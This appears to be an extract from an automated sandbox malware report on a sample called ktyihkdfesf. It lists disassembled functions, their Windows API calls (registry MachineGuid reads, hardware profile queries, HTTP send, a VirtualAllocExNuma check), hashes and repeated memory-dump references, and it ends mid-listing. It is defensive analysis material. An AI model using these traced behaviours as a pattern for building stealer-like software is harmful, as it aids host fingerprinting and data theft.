                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 4174444224-2861137601
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 855039ff49ac9ec10de8df2a88766b452ea63e393e544b77beb2aca96e60e2a3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E418131600219ABCB15EBA2D9529EE7369AF44344F41441EF90267241DF7CBD86CBE9
                                                                                                                                                                                                                                                                                                  Function 00411120 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CharCloseOpenQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                  • API String ID: 47404925-1211650757
                                                                                                                                                                                                                                                                                                  • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                                                  Function 00402520 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3928403917-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8153bee1c1f18c4321dbbef74a0984615106f9ad5e3a5235685405019ec4d011
                                                                                                                                                                                                                                                                                                  • Instruction ID: 52b5ec612f7533a417f76914090347e108d7196820fc58126e476e1f6b56743e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8153bee1c1f18c4321dbbef74a0984615106f9ad5e3a5235685405019ec4d011
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 152107B26006011BCB24AE7D9E9842FB7E9DF953107150B3FF452D77C1E6B9D884829D
                                                                                                                                                                                                                                                                                                  Function 004076B0 Relevance: 9.1, APIs: 6, Instructions: 74filememoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                                  • Instruction ID: 57bb2ce498e656ac9101d6a6683512ef7afea4cd211be1053fa5c26a8075d75e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21DE75204B009FC320EF64C984A6AB7F5FF89354F00482DF996CB2A0D735B945CBA2
                                                                                                                                                                                                                                                                                                  Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 51memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70da7db2db91f88941c3e71440bfa6ebbd6eb466aaac7195974b89fd4c7015d6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D431A0665457E3102B386C09BEFB794AF16705F505538F888A2271EB20898586E9
                                                                                                                                                                                                                                                                                                  Function 00410700 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                                                                                  • API String ID: 277847849-1654365787
                                                                                                                                                                                                                                                                                                  • Opcode ID: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9523786d007b465f85d219b7e39a8a5dfbdd483b20afe91046872d233f87955e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9201A5313003187BD620B6629C56FEF775E9FC5758F04082EB9455B282DEBCA8C587AA
                                                                                                                                                                                                                                                                                                  Function 00410CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
